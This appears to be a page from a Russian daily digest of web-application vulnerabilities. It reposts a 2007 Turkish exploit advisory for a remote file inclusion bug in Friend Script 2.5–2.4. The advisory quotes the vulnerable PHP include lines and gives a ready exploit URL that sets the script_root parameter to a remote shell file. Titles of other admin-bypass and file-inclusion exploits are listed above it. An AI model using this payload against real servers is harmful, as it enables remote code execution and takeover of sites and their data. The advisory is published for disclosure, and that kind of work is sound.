Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

BellaBook Admin Bypass/Remote Code Execution

BellaBiblio Admin Login Bypass

RFI ====> vBulletin v3.6.5

Dora Emlak Script v1.0 (tr) Admin Login ByPass

From:	yollubunlar_(at)_yollubunlar.org <yollubunlar_(at)_yollubunlar.org>
Date:	31 июля 2007 г.
Subject:	Friend Script 2.5 - 2.4 Remote File İnclude

###############################################################################

Olmek Var$a Kaderde Dert Ekleme Derdine Team :)

###############################################################################


Portal:Friend Script 2.5 - 2.4 Remote File İnclude Vulnerable
Author:Yollubunlar
http://yollubunlar.Org

###############################################################################


Bug İn tell_a_friend.inc.php

         include($script_root . 'inc/functions.inc.php');
         include($script_root . 'inc/template.class.inc.php');
         include($script_root . 'inc/formmail.class.inc.php');

###############################################################################

Exploit:script_path/inc/tell_a_friend.inc.php?script_root=Sh3ll.txt?

###############################################################################

Greetz : EveryBody

###############################################################################